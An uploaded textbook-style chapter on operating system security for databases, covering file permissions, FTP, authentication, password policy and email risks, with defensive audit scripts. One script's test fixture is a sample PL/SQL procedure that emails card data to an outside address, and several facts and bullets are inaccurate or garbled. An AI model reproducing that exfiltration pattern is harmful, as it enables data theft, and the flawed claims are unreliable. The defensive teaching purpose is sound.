Database Security - OS

The document discusses the components of an operating system security environment and how they can be vulnerable access points if not properly secured. It covers the three main components - services, files, and memory - and provides an example of how improperly configured file permissions allowed a hacker to access a database password and steal customer data.

Uploaded by

Piyush Kumar

Introduction

The operating system is the lifeblood of a computer system; without it, the hardware cannot
function, as you are already aware. The operating system is a group of applications that
controls the computer and grants users and other programs access to its resources. No
application can function without the operating system, no matter how big or complex or how
basic.

One of the primary gateways to the database management system is the operating system.
Usually, the operating system authenticates you if you wish to access the database locally or
remotely. Depending on the set of privileges you have been granted, you can operate or
access the resources for which you have authorization once you have successfully
authenticated with the system. Since the operating system runs the machine where the
database is located, it becomes the first line of defense against any infringements or
violations of database security.

This chapter provides an overview of operating system security challenges from the
viewpoint of databases, assisting you in understanding how security violations happen and
where to concentrate your efforts while trying to safeguard a database.

Technical information on setting up or using the operating system from an operational or
security perspective is not what this chapter is meant to cover. Furthermore, there is no
operating system-specific connection to the information in this chapter. As a matter of fact,
any operating system can use the information in this chapter. Nonetheless, there are specific
situations where technical information is provided. UNIX and Windows 2000 or Windows XP
are the operating systems that are mentioned in these situations.

Operating System Overview


An overview of the operating system's features is provided in this section. You can skip this
section and go to the next section, which discusses the operating system security
environment, if you are already familiar with this subject.

Computer hardware employs digital resources to tackle a variety of computing issues quickly
and accurately. It is very difficult for you to communicate with the computer hardware in 0s
and 1s in order to utilise this technology.

Numerous computer businesses realised that in order for the user to control the computer
hardware, there needed to be a mediator between the user and the hardware. That was the
operating system's inception. A set of programs known as an operating system gives the
user access to control the hardware of a computer. But the operating system accomplishes
more than just this. Actually, the operating system does a lot of work, ranging from resource
management to job scheduling.

The three layers of a computer system, as seen in Figure 2-1, are described as follows:
■ The inner layer represents the computer hardware, which is managed and controlled
by the layer in the middle.
■ The middle layer is the operating system.
■ The outer layer represents the various pieces of software that users utilise to do
particular tasks or address problems.

Three computer system layers

The essential features and capabilities of an operating system include the following:

■ Performs multitasking, or managing several duties or tasks concurrently

■ Performs multisharing, enabling numerous users to use the computer hardware
simultaneously

■ Controls computer resources, including memory, disk storage, input and output devices,
and CPU (central processing unit)

■ Regulates the course of events

■ Offers an interface for using the computer

■ Manages accounts and user activities

■ Executes software applications and tools

■ Offers capability to implement security protocols

■ Schedules chores and jobs to be completed

■ Offers hardware and operating system configuration tools

There are several different operating system vendors: Microsoft offers Windows; Sun
Microsystems, HP, and IBM offer UNIX; Red Hat offers numerous Linux "flavors"; and Apple
offers Macintosh OS. This brief overview of the fundamentals of the operating system is
meant to get you ready for the next section, where you can acquire an understanding of the
operating system security environment and an awareness of operating system security
access points and the security dangers they present.

The Operating System Security Environment


The elements of the database environment are depicted in Figure 2-2 and are described in
Chapter 1. The database environment's operating system component may be vulnerable,
making it possible for unauthorised people to break the laws put in place to safeguard the
database and its contents. The door of the room housing the operating system-running
computer needs to be secured as firmly as possible using guards, peepholes, security
cameras, chain locks, padlocks, and other detection and authentication methods.

Database security environment


Consider the physical structure of a bank (the operating system), a safe (the database), and
cash (the data) while considering ways to secure an operating system. Thieves must first
enter the bank's premises and then break into the safe in order to loot the bank. A history of
robberies has taught bank executives how to safeguard their establishments throughout
time. Many security measures are implemented and upheld, including the building's
architectural design, electronic and digital gadgets, and mechanical apparatus.
Banks take these expensive precautions in order to safeguard their customers' funds and
preserve their trust, but they also do this for other reasons.

You must put forth much effort to secure the access door leading to the database where the
data is stored if you are the system administrator in charge of guarding it. This section
delves into the components of the operating system security environment that may be
compromised, potentially resulting in breaches of data security.

The Components of an Operating System Security Environment


The operating system security environment's constituent parts serve as database access
points. These access points are unreliable and unsafe means of accessing database data.
Figure 2-3 shows the three parts (layers) of the operating system: files, services, and
memory. The services layer is an entrance point and a gateway to the operating system as
well as to the other components, such as files and memory, as seen in the figure. File
management, Web services, network services, and other operating system features and
functionalities are included in the services component.

Operating system security environment

The system's physical memory makes up the memory component, whereas the files
component is made up of the disk's stored files. Why are these elements crucial? The
security of the database system may be compromised if these components are not properly
protected. From the standpoint of database security, each operating system component is
examined in the ensuing sections.

Services
Services make up the majority of the operating system security environment. The
functionality that the operating system provides as part of its essential utilities is included in
the services component. These utilities are used by users to access the operating system
and all of the capabilities they are permitted to use. Every service can become a security
issue if it is not properly configured and secured, making it an access point and vulnerability.
These services range widely and consist of basic functions like user identity verification,
essential features like remote copy (a program that lets you copy files to and from a remote
computer system), and standard procedures like password policies and user administration
duties.

Files
Here is an example of a data compromise incident. A tiny telecom firm hired a system
engineer as a contractor to update the operating system and the primary application to a
newer software version. The engineer's duties included configuring UNIX scripts to keep an
eye on the database. The system was put into production following several hours of testing
and implementation. A few months later, the system administrator was looking through the
system logs when he came across some surprising anomalous activity. Someone had
broken into the system! For the past three months, a single IP address had been the source
of an intrusion that resulted in massive traffic every night at various times.

After hours of log analysis by the company's system administrators and other engineers,
they were able to identify what had happened with the database administrator's assistance.
Based on a trail of spool files left behind, it was discovered that a hacker had compromised
the system, managed to obtain the password for a database account, and moved client data
from two database tables. The operations manager needed more information to fully
understand what had occurred. How was the password obtained by the hacker? The
machine was subjected to another audit, which involved a review of each and every file,
including permissions, contents, date and time stamps, and more.

One of the system operators found a file containing the database account name and
password while the audit was on its sixth straight day. It was a file made by the system
engineer to keep track of the scripts he had set up. This file was utilized by the scripts to
retrieve the password and username. In addition to being in plaintext (not encrypted), the file
had a permission set of -rw-r--r--, meaning that anybody could read it.

When improperly configured, file permission and file sharing pose frequent risks to system
security. Files need to be safeguarded against being written to or altered, as well as from
being viewed by unauthorized parties. Since files include data, having the wrong
permissions on a file could result in a disastrous loss of data or a privacy violation. The
elaborative function found in most operating systems allows for the implementation of any
desired file processing method. File sharing, in which people use various peer-to-peer
software programs, is another practice that poses a significant security risk.

File Permissions
Each operating system has a way of putting file permissions into practice to grant other
users read, write, or execute privileges. The Windows 2000 implementation of
file permission is examined first in the following sections, and then the UNIX implementation.

Microsoft Windows 2000


To modify the permissions of a file in Windows 2000, open the file's Properties and
select the Security tab, as seen in Figure 2-4. Every user's allocated permission is
displayed on the Security tab. You can grant and take away rights from users on this
screen. Keep in mind that Allow denotes authorization and Deny denotes revocation.

UNIX
File permissions function differently in UNIX than they do in Windows. There are three
permission settings for every file: one for the file owner, one for the group the owner is a
member of, and a third for all other users. As shown in Figure 2-5, each setting is composed
of rwx, where r denotes read permission, w denotes write permission, and x denotes execute
permission. The file permissions of initSAM.ora, as shown in Figure 2-5, are as follows: read
and write permission for the file owner, read permission for the oinstall group that the file
owner is a member of, and read permission for all other users.

The chmod command can be used to set the following file permissions:

■ Execute only

■ Write only

■ Execute and write

■ Read only

■ Execute and read

■ Write and read

■ Read, write, and execute

You can use the following command to modify the file mail_list's permissions to -rw-rw-r--:

$ chmod 664 mail_list

For further details on the chmod command, refer to the documentation provided by your
UNIX operating system.
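
The incident in the Files section (a plaintext credentials file left at -rw-r--r--) and the UNIX permission settings above can be checked together with a small audit script. This is an added example, not part of the original chapter; the credential pattern, the sample file names and their contents are assumptions constructed for illustration.

```python
import os
import re
import stat

# Heuristic for lines that look like stored credentials (an assumption of this
# example; tune it to the naming used by your own scripts).
CREDENTIAL_RE = re.compile(rb"(?i)(password|passwd|pwd)\s*[=:]\s*\S+")


def describe_mode(mode):
    """Render permission bits as `ls -l` does, e.g. 0o664 -> '-rw-rw-r--'."""
    return stat.filemode(stat.S_IFREG | stat.S_IMODE(mode))


def audit_tree(root):
    """List regular files under `root` that "other" users can read or write."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            info = os.lstat(path)              # lstat: do not follow symlinks
            if not stat.S_ISREG(info.st_mode):
                continue
            mode = stat.S_IMODE(info.st_mode)
            if not mode & (stat.S_IROTH | stat.S_IWOTH):
                continue                       # "other" has no read/write access
            try:
                with open(path, "rb") as handle:
                    holds_secret = bool(CREDENTIAL_RE.search(handle.read(65536)))
            except OSError:
                holds_secret = False           # unreadable by the auditor itself
            findings.append({
                "path": path,
                "mode": describe_mode(mode),
                "world_writable": bool(mode & stat.S_IWOTH),
                "credentials": holds_secret,
            })
    # Credential-bearing files first, then by path, so the worst cases lead.
    return sorted(findings, key=lambda f: (not f["credentials"], f["path"]))


def restrict_to_owner(path):
    """Equivalent of `chmod 600 path`: owner read/write, nothing for group/other."""
    os.chmod(path, stat.S_IRUSR | stat.S_IWUSR)
    return describe_mode(os.lstat(path).st_mode)


def build_sample_tree(root):
    """Create constructed sample files (names, contents and modes are made up)."""
    samples = {
        "monitor.conf": (b"db_user=monitor\ndb_password=Example-Only-1\n", 0o644),
        "mail_list": (b"alice@example.com\nbob@example.com\n", 0o664),
        "private.conf": (b"db_password=Example-Only-2\n", 0o600),
    }
    for name, (content, mode) in samples.items():
        path = os.path.join(root, name)
        with open(path, "wb") as handle:
            handle.write(content)
        os.chmod(path, mode)                   # explicit, so umask does not matter


if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        for finding in audit_tree(root):
            print(finding["mode"], finding["path"],
                  "CONTAINS CREDENTIALS" if finding["credentials"] else "")
            if finding["credentials"]:
                print("  tightened to", restrict_to_owner(finding["path"]))
```

Run against the directory that holds monitoring scripts and their configuration; any finding with credentials set should be tightened and the stored password rotated.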

File Transfer
Steve works for a local chain of retail establishments as a production Oracle DBA. He is in
charge of managing more than 20 database applications. Along with a database manager,
he works as one of three database administrators. The QA (quality assurance) database
refresh is one of his weekly responsibilities. Steve utilises the Oracle export and import
utilities because the database is not very big. The procedure is as follows: A scheduled job
exports the entire database on Sunday. The file created by the export program is then
transported to the host computer housing the QA database and imported.

Steve received a summons one day from the chief technology officer (CTO) for an urgent
meeting. Steve was surprised to see that his manager, the system manager, and the
security director were the only attendees at the meeting. Steve felt both curious and nervous
about the meeting. In his opening remarks, the CTO discussed the weekly refresh procedure
and the reasons for its modification, including the discovery of an infraction that had
fortunately been averted. Having access to both the file and the machine, one of the
developers was able to copy the file and move it to his own computer. The developer had no
intention of jeopardising the confidentiality of firm information; he copied the file in order
to work from home.

This kind of "innocent" security compromise occurs much too often in all kinds and sizes of
organisations. Who is in charge of keeping this procedure safe? Everybody is accountable.
What might have occurred if this violation had not been detected? Data integrity and
confidentiality could have been compromised, which is a serious security breach.
How can you prevent further violation of this process? The best practices in this section
can be used to safeguard file-transfer operations.

To begin with, you need to be aware of the following information regarding FTP (File Transfer
Protocol):

■ FTP is an Internet tool for transferring files from one computer to another.

■ FTP clients and servers transmit passwords and user names in plaintext (not encrypted).
This implies that any hacker can readily obtain the logon information by listening in
on network traffic.

■ Login information is not the only data that is transferred unencrypted. Files are also sent
without encryption.

■ FTP cannot be used to transfer files with a root account.

■ Anonymous FTP is the ability to access the FTP server without requiring authentication.
Usually, this technique is employed to grant access to public domain files.

The following are some recommendations regarding file transfers:

■ Never use the standard FTP software. If at all possible, utilize the Secure FTP tool
instead.

■ Create two File Transfer Protocol (FTP) directories: one for write-only file uploads and
another for read-only file downloads.

■ For FTP, use dedicated accounts that are restricted to accessing only the files and
directories inside the UPLOAD and DOWNLOAD directories.

■ Activate logging, and periodically check the FTP logs for odd activity.

■ Allow FTP privileges to only authorized operators.

Sharing Files
Whenever there is file sharing, there are always security concerns and hazards involved.
Peer-to-peer technology is becoming more and more popular. Users can share files with
other users over the Internet by using peer-to-peer apps. These kinds of tools open your
system up to a whole new can of worms—in this case, viruses and worms. If you were to
survey users of peer-to-peer software, the vast majority of them would probably have some
form of malware on their computers, such as spyware, viruses, or worms. Most businesses
forbid using these kinds of programs, and with good reason. It is appropriate that users who
violate this policy face legal action. These programs are blocked mostly for the following
reasons:
■ Malicious code: Most of the files being exchanged on peer-to-peer networks are
contaminated with malware that could damage your computer. Malicious code is a
well-known feature of these programs. A program, macro, or script that intentionally
corrupts files or interferes with computer operations is known as malicious code. Malicious
code comes in many forms, including Trojan horses, worms, viruses, and time bombs.

■ Adware and spyware: These applications, which resemble malicious code, are used to
create pop-up adverts and record keystrokes, websites visited, page clicks, and other
activities. Websites and people sponsor peer-to-peer programs.

■ Confidentiality and privacy: If peer-to-peer apps are set up incorrectly, users have access
to and visibility into a variety of private and sensitive data that is stored on the computer
system.

■ Pornography: A sizable user base exchanges pornographic pictures or videos via
peer-to-peer apps, some of which may offend or be unsuitable for other users.

■ Copyright issues: Sharing music files, videos, software, games, or electronic books is made
extremely simple by peer-to-peer technologies. This medium propagates piracy as a
legitimate activity and encourages people to violate the property of others.

Having learned about the dangers associated with peer-to-peer software, you should keep
an eye on any network activity to find out who is utilizing this kind of software. Employees
who are detected using these systems should be reprimanded to teach them about the
various risks that peer-to-peer programs bring to the organization.

Memory
Memory is the final operating system component that will be covered in this chapter. You
might be wondering how memory can be used as an access point for illicit activity. Numerous
poorly constructed utilities and applications have the potential to corrupt memory contents.
Despite the fact that these programs don't intentionally cause harm, you should be aware of
them. Generally speaking, you have two choices when using an application that
compromises the integrity of your data: either uninstall it or install a patch (service pack) to
resolve the issue. Programs that purposefully corrupt or scan data in memory, on the other
hand, have the potential to compromise data integrity as well as use data for illicit purposes.

Authentication Methods
One essential function of the operating system is authentication. It is a procedure that
confirms the user's identification before granting access to the operating system. The system
is vulnerable to threats and security issues when the authentication process is poor. The
majority of security administrators use both digital and physical forms of authentication.

The physical authentication method allows physical entry to the company's property. The
majority of businesses employ card readers and magnetic cards to manage access to a
building, workplace, lab, or data center. Biometric or biomagnetic technologies are
used for physical authentication of workers in mission-critical or sensitive operations. These
technologies include, but are not limited to, heat detection, voice recognition, fingerprint,
handprint, and retinal scans.

The method of digital authentication involves confirming the user's identification through
the use of software or a digital mechanism. The following sections list the digital
authentication mechanisms that are employed by numerous organizations and operating
systems.

Digital Certificate

One popular kind of authentication in e-commerce (doing business over the Internet) is the
digital certificate. A digital certificate is an electronic passport that serves to identify and
authenticate the certificate holder. The holder may be a person, a machine, a Web
site, or a network system. This digital certificate is an unchangeable electronic file that
was created by a reputable organization called the certificate authority.

Digital Token (Security Token)


A digital token is a portable electronic device that users carry about for network or computer
system authentication. Typically, the token holder's unique number is shown by this device
and is used in conjunction with their personal identification number (PIN) as the password. It
is exceedingly difficult for hackers to pass authentication because this token continuously
displays a new number, indicating that a new password is used each time a user is
authorized. This strategy is frequently used by many companies. It's important to clarify that
if a user misplaces this token, they should report it right away and have their account
blocked until the issue is resolved.

Digital Card
Smart cards and security cards are other names for digital cards. The dimensions of this
card are similar to those of a credit card, but it lacks a magnetic strip in favour of an
electronic circuit that contains user identity data, including name, ID, and password. Through
the use of a card reader device, the card is utilized to authenticate the holder to a computer
system.

Kerberos
Kerberos was developed by the Massachusetts Institute of Technology (MIT) to enable two
parties to exchange information over an open network by assigning a unique key, called a
ticket, to each user. This ticket is used to encrypt communicated messages.

Lightweight Directory Access Protocol (LDAP)

The University of Michigan created LDAP, an authentication technique that makes use of a
centralized directory database that stores data on individuals, workplaces, and devices in a
hierarchical fashion. It is simple to deploy an LDAP directory among numerous network
servers. LDAP can be used to store data regarding:
■ Users (user ID and name)
■ Passwords
■ Internal phone book
■ Security keys

While LDAP servers are effective at reading data from directories, they are not appropriate
for handling constantly changing data. This kind of authentication is widely used in operating
systems and apps due to its ease of implementation. Use LDAP for these reasons:
■ LDAP can be used on all platforms (that is, it is independent of the operating system).
■ It requires little upkeep.
■ It can be used in a variety of ways.

LDAP architecture follows the client/server model: the client asks the LDAP server for
information from the directory, and the server responds.

Windows New Technology LAN Manager (NTLM)

Microsoft created and utilizes NT LAN Manager, a challenge/response authentication system
that sends and receives credentials over the network using encryption and decryption.
Newer Windows operating system versions do not support or use this mechanism.

NTLM uses a challenge/response technique for authentication. This basically means that the
server hosting the resource "challenges" you to authenticate yourself when you try to access
it. After that, you provide a "response" to the challenge, and the server will authenticate you
if you answer correctly. After you have successfully authenticated, the server authorises
access to the resource you have requested. Examining more closely reveals that there are
three messages involved in the authentication process. The first request for authentication is
sent by the client to the server in Message 1. The challenge is then contained in Message 2,
which is sent by the server to the client. There are eight random bytes in the challenge. The
answer to the challenge is contained in Message 3, which is transmitted from the client to
the server. The response is an eight-byte challenge hashed into a 24-byte DES hash that can
only be unlocked with a set of DES keys made with the user's password. We won't go into
detail about the algorithm that does all of this here, but one aspect of it is crucial for
developing password policies. The password is separated into two seven-byte segments as
indicated in Figure 4-4 after being padded to a total of 14 bytes. Later on, you'll see why this
is significant.

Public Key Infrastructure (PKI)

Public key encryption, or PKI, is an authentication technique where the user maintains a
private key and the authentication company maintains a public key. The two parties'
communication messages are encrypted and decrypted using these two keys. On the user's
computer, the private key is often stored as a digital certificate.

RADIUS

Network devices frequently employ the authentication technique known as Remote
Authentication Dial-In User Services (RADIUS) to offer a centralized authentication
mechanism. RADIUS is a client/server system that connects to a RADIUS server via a dial-
up server, a virtual private network (VPN), or a wireless access point.

Secure Sockets Layers (SSL)

Secure Sockets Layers (SSL) is one way to convey authentication information through an
encrypted channel on the network. Websites frequently utilize this technique to
secure correspondence with clients. Netscape Communications created this protocol to
provide secure communication between the client and server.

Secure Remote Password (SRP)


The University of Stanford developed SRP. This protocol does not require the password to
be locally saved in either plaintext or encrypted format. Installing this technique is quite
simple, and it does not need the configuration of a client or server. Furthermore, this
approach is immune to brute-force or dictionary attacks.

Authorization

The process of demonstrating that users are who they say they are is known as
authentication. On the other side, authorization is the procedure that determines whether
users are allowed to carry out the tasks they ask for. Until the user has been authenticated,
authorization cannot be completed. Authorization relates to the rights and privileges that the
user has been bestowed with. Assume, for instance, that you have established a user
account solely for the purpose of file transmission. In order to be authenticated, this user is
given a user name and password. You can grant this user read authorization on the
DOWNLOAD directory and write authorization on the UPLOAD folder. This
indicates that the user is not allowed to do any other jobs and is only allowed to read and
write to these two folders.

User Administration
Every operating system must offer authentication and authorization in order to guarantee
users' safe access to the computer's logical and physical resources. Another related
service is user administration. Administrators can establish password rules, grant users
capabilities, and create user accounts with this functionality. User administration is not
frequently used by hackers, but when it is, security problems and threats might arise. The
best practices for user management are listed below, in no particular order.

■ Adopt a consistent naming scheme by combining the first name and last name linked to
the user account.
■ Always require the user to log in before granting access to an account with a
password. Alter it at the
■ Make sure that every password is stored in a file that is password-protected.
■ Never use the default password on any kind of account.
■ If a machine has been compromised, or you believe it has, change all of the passwords
for every account that is currently in use.
■ Use distinct accounts for various users and applications.
■ Assign users to their own file system that is distinct from apps and data.
■ Inform users on the process of choosing a password.
■ When a user's job is terminated or ends, lock their account.
■ When an account is not utilized for a predetermined amount of time, lock it.
■ When connected remotely, use Secure Shell (ssh), Secure Copy (scp), and Secure FTP for
telneting, copying, and file transfers, respectively.
■ Isolate the infected computer system from other systems in order to stop more
encroachment.
■ When a system is breached, collaborate with the security office and management to
identify the root of the violation.
■ Conduct random auditing procedures on a frequent basis.

Password Policies

The first line of protection against unauthorized access to an operating system is a strong
password policy. Hackers typically attempt to gain entry to the system by utilizing an account
and password through the front entrance. They try different approaches if this one doesn't
work. Actually, the majority of hackers use password-cracking software that employs the
dictionary strategy. These programs guess the password by using dictionary word
permutations. To make it more difficult for hackers to access your system, as the system
administrator you should collaborate with the security manager to create a password
policy. You can implement a wide range of procedures and guidelines for your business. The
ideal password policy, however, is one that aligns with your business's goals and is upheld
throughout the entire organization. You can use one or more of the following password
practices to create a policy plan that works for your business.

■ Password aging: Indicates to the system how long a password can stay active before
needing to be reset. The majority of businesses use a three-month policy; however, you
should choose the duration according to your company's needs and security requirements.

■ Password reuse: This practice can be interpreted and used in three ways. It indicates the
number of days that must elapse before you can reuse a password, tells the system how
many times you can reuse a password, or determines whether the system permits the reuse
of passwords.

■ Password history: This practice is related to password reuse and tells the system how
many passwords it should store for each account. If you want to know whether a password
can be reused, you can look into the history.

■ Password encryption: A technique that keeps the password in an unreadable format after it
has been encrypted (scrambled).

■ Password storage: The location where the password is kept secure and out of sight.

■ Password complexity: One of the most crucial password practices that every password
policy should follow. Passwords classified as complex consist of a mix of uppercase and
lowercase characters, numbers, and symbols. Users are forced to select a password that is
difficult to crack when there is a password complexity requirement. A list of guidelines that
can be applied when making complicated passwords is provided below:
  ■ Numbers, symbols, and alphabetic letters (a-z, A-Z, 0-9, !@#$%^&*()_+}[":><?]) must
  all be present in the password.
  ■ The minimum length of a password is normally six characters; however, eight characters
  is advised.
  ■ Uppercase and lowercase letters must be used in combination for the alphabetical
  characters.
  ■ No portion of your account, first or last name, birthdate, phone number, license
  number, registration number, employee number, spouse or child's name, parent or sibling's
  name, city or country of residence, or any combination of these may be used in your
  password.

■ Logon retries: One wise move would be to permit the user up to three failed attempts at
login before the account is locked and an administrator is notified.

Password protection: As a manager, system administrator, security manager, or human
resources manager, you must educate and warn staff members about the risks associated
with keeping passwords hidden in a location where they can be easily recovered in the event
that they are forgotten. This is a very difficult practice to enforce. Even if the paper is kept in
a locked location, writing down a password is not a good idea. If you must write down a
password, use a file that is encrypted and accessible to you alone.

Single sign-on: This feature enables you to log in to a server (host machine) just once,
saving you the trouble of logging in again when you access another server on which you have
a login. Even though single sign-on is quite convenient, mission-critical operations,
financial institutions, government agencies, and other comparable businesses shouldn't use it.
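The complexity, history and logon-retry practices above can be enforced together at the point where a password is set and checked. The following is an added example, not code from the original document; the names `complexity_problems` and `Account`, the history depth of five, and the use of PBKDF2 for the stored form are assumptions made for the illustration.

```python
import hashlib, hmac, os, string

MIN_LENGTH = 8         # the page advises eight characters
HISTORY_DEPTH = 5      # assumed; the page gives no number
MAX_FAILED_LOGONS = 3  # the page: lock after three failed attempts

def _digest(password, salt):
    # Salted, slow hash: stored entries stay unreadable.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def complexity_problems(password, personal_items):
    """Return the page's rules that the candidate password breaks."""
    problems = [] if len(password) >= MIN_LENGTH else ["too short"]
    classes = {"lowercase letter": str.islower, "uppercase letter": str.isupper,
               "number": str.isdigit, "symbol": lambda c: c in string.punctuation}
    for label, test in classes.items():
        if not any(test(c) for c in password):
            problems.append("no " + label)
    lowered = password.lower()
    if any(len(p) >= 3 and p.lower() in lowered for p in personal_items):
        problems.append("contains personal information")
    return problems

class Account:
    def __init__(self, personal_items):
        self.personal_items = personal_items
        self.history = []   # (salt, digest) pairs, newest last
        self.failed = 0
        self.locked = False

    def set_password(self, password):
        problems = complexity_problems(password, self.personal_items)
        if any(hmac.compare_digest(_digest(password, s), d) for s, d in self.history):
            problems.append("reused from password history")
        if not problems:
            salt = os.urandom(16)
            self.history = (self.history + [(salt, _digest(password, salt))])[-HISTORY_DEPTH:]
        return problems

    def logon(self, password):
        if self.locked or not self.history:
            return False
        salt, digest = self.history[-1]
        if hmac.compare_digest(_digest(password, salt), digest):
            self.failed = 0
            return True
        self.failed += 1
        self.locked = self.failed >= MAX_FAILED_LOGONS  # notify an administrator here
        return False
```

Once the account is locked, even the correct password is refused until an administrator resets it, which is the behaviour the logon-retry practice describes.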

Operating System Vulnerabilities


You can find a list of the top 10 Windows and UNIX vulnerabilities in this section. The tools
on the list are those that hackers employ to get access to the system; most of the time, these
intrusions result in loss of data, loss of service, invasions of privacy, corruption of the data,
or any combination of these. On October 28, 2003, the SANS Institute, the Canadian and
British departments of homeland security, and the United States Department of Homeland
Security announced this list.

The most common Windows system vulnerabilities are:
Internet Information Services (IIS)
Microsoft SQL Server (MSSQL)
Windows Authentication
Internet Explorer (IE)
Windows Remote Access Services
Microsoft Data Access Components (MDAC)
Windows Scripting Host (WSH)
Microsoft Outlook and Outlook Express
Windows peer-to-peer (P2P) file sharing
Simple Network Management Protocol (SNMP)

The top UNIX system vulnerabilities are:
BIND Domain Name System
Java Web Server
Remote Procedure Calls (RPC)
General UNIX authentication accounts with no password or a weak password
Clear text services
Forward a message
Secure Shell (SSH)
Simple Network Management Protocol (SNMP)
Misconfiguration of enterprise services NFS/NIS
Open Secure Sockets Layer (SSL)

Email Safety

Email may be the tool that hackers use more than any other to take advantage of viruses,
worms, and other computer system invaders. This is undoubtedly the case given that email is
the communication tool that both public and private companies use the most frequently. Email
was the medium used in many of the most well-known worm and virus attacks; for instance,
the Melissa virus, the Mydoom worm, the ILOVEYOU worm, and the Love Bug worm were
all spread through email. This is evident from the number of incidents that have happened in
the last five years.
The fact that email is used to transmit offensive messages, private and personal information,
spam, and viruses and worms is even more concerning and dangerous. Here is another
real-life incident.
A reputable department store hired an Oracle database developer to work on its back
office components. Writing PL/SQL code to apply business rules and other processing logic
fell within the purview of this developer. A few weeks later, the application launched
smoothly and without any problems. This developer lost his job a few months later as a
result of the economic slump. The developer was no longer in the picture, but his influence
would last for months.
Customer complaints about credit card purchases made without their knowledge soon began
to arrive at the department store. After looking over the complaints, the department store's
fraud bureau quickly confirmed that the clients' concerns were legitimate. Every employee in
every department received a note asking them to keep an eye out for any unusual activities.
The information technology group also called a special meeting to discuss strategies for
keeping an eye on and auditing every database activity. Three database engineers formed
an internal audit group as a result of the meeting.
Following extensive research, the team discovered a module inside a PL/SQL item that
sent email to an obscure email address. This module generated and submitted a report
providing a complete list of 20 clients' credit information. Furthermore, the module was
set up to be run by the Oracle job scheduler, DBMS_JOB, once a week. This did
occur, and other businesses that disregard stringent security protocols to protect data run
the risk of experiencing the same thing.
In the aforementioned instance, system operations were unable to keep an eye on what was
going on with the email server on the machine that housed the database. The database
administration team also neglected to look at the PL/SQL code to understand what the code
was doing. The database developer's code was not reviewed by the development team. Lack
of security checks and controls caused the entire system development process to fail before
it even happened.
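The code review that was skipped in this incident can be partly automated by scanning stored PL/SQL source for units that both send mail and read sensitive tables, and for job submissions. The following is an added example, not code from the original document or from the incident; the page does not say how the module sent mail, so matching on Oracle's UTL_SMTP and UTL_MAIL packages is an assumption, and the table name, addresses and sample source are constructed.

```python
import re

MAIL_API = re.compile(r"\bUTL_(?:SMTP|MAIL)\s*\.", re.I)   # assumed mail packages
JOB_SUBMIT = re.compile(r"\bDBMS_JOB\s*\.\s*SUBMIT\b", re.I)
ADDRESS = re.compile(r"'([\w.+-]+@([\w-]+(?:\.[\w-]+)+))'")
COMMENTS = re.compile(r"--[^\n]*|/\*.*?\*/", re.S)

def review_source(name, source, sensitive_tables, allowed_domains):
    """Return review findings for one stored PL/SQL unit."""
    code = COMMENTS.sub(" ", source)          # ignore commented-out text
    findings = []
    touched = [t for t in sensitive_tables
               if re.search(rf"\b{re.escape(t)}\b", code, re.I)]
    if MAIL_API.search(code) and touched:
        findings.append(f"{name}: sends mail and reads {', '.join(touched)}")
    for address, domain in ADDRESS.findall(code):
        if domain.lower() not in allowed_domains:
            findings.append(f"{name}: external recipient {address}")
    if JOB_SUBMIT.search(code):
        findings.append(f"{name}: schedules a job with DBMS_JOB.SUBMIT")
    return findings

def review_all(units, sensitive_tables, allowed_domains):
    out = []
    for name, source in sorted(units.items()):
        out += review_source(name, source, sensitive_tables, allowed_domains)
    return out

# Constructed sample source, not the code from the incident.
SAMPLE_UNITS = {
    "ORDER_RULES": """
        PROCEDURE apply_discount IS BEGIN
          UPDATE orders SET total = total * 0.9 WHERE promo = 'Y';
        END;""",
    "WEEKLY_REPORT": """
        PROCEDURE send_report IS BEGIN
          -- summary for the back office
          FOR r IN (SELECT name, card_no FROM customer_cards WHERE ROWNUM <= 20) LOOP
            UTL_MAIL.SEND(sender => 'app@store.example',
                          recipients => 'dropbox@mailhost.invalid',
                          message => r.name || r.card_no);
          END LOOP;
        END;""",
    "INSTALL_JOB": """
        BEGIN DBMS_JOB.SUBMIT(:j, 'send_report;', SYSDATE, 'SYSDATE + 7'); END;""",
}

if __name__ == "__main__":
    for line in review_all(SAMPLE_UNITS, ["customer_cards"], {"store.example"}):
        print(line)
```

In practice the `units` dictionary would be filled from an export of the database's stored source, and each finding would go to a human reviewer rather than being treated as proof of abuse.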

Many employees use email to connect with friends, clients, and coworkers. However, some
of these employees might share personal information in violation of the company's security
regulations. Numerous studies and reports assert that angry employees are using email
more frequently to leak private information both inside and outside the firm. For you, what
does this mean? Regardless of your position, you should have the moral character to follow
the company's regulations and show respect for the confidentiality and privacy of others. For
those who are unaware of what this means: in order to identify any suspicious activity and
notify management right away, you must have auditing and monitoring controls. Avoid
configuring the email server on a machine that contains sensitive data, and refrain from
disclosing technical information about the email server without a formal written request from
the technology group manager outlining the necessity of the information. These measures
will help prevent incidents like the one that was just described.

CHAPTER SUMMARY
A group of programs known as an operating system enables user interaction with the
hardware of a computer.

One of the primary ways to access the database management system is through an
operating system.

Unauthorised people may break any rules put in place to protect the database if the
operating system component of the database security environment is compromised.

FUNDAMENTALS OF OPERATING SYSTEM SECURITY

The procedure known as authentication verifies the user's identity before granting
access to the operating system.

Physical access to the company's property is possible through physical
authentication methods.

Verifying a user's identity through a digital mechanism or software is a digital
authentication method.

A digital certificate is an electronic passport that identifies and authenticates the
certificate holder.

A digital token is a portable electronic device used to authenticate to a network or
computer system.

Like a credit card, a digital card contains user-identifying information such as name,
ID, and password.

Kerberos assigns a unique key to each user, allowing two parties to exchange
information over an open network.

LDAP is an authentication technique that stores data about individuals, workplaces,
and devices in a hierarchical fashion using a centralised directory database.

PKI is a technique for authentication in which the user maintains a private key and
the authentication company possesses a public key.

Network devices frequently employ the authentication technique known as Remote
Authentication Dial-In User Services (RADIUS) to offer a centralised authentication
mechanism.

Using Secure Sockets Layer, authentication data can be encrypted and sent over
the internet.

An SRP protocol prevents the password from being locally stored in encrypted or
unencrypted form.

The authorisation process establishes if the user can carry out the requested action.

Until the user has been authenticated, authorization cannot be completed.

Authorization relates to the rights and privileges the user has been bestowed with.

The first line of defence for safeguarding operating system access is a strong
password policy.

The ideal password policy is one that aligns with your business goals and is upheld
throughout the entire organisation.

File sharing and permissions are frequent risks to system security when configured
incorrectly.

Security threats and risks are a natural result of file sharing.

Email is perhaps the most common tool used by hackers to take advantage of computer
system invaders such as viruses and worms.
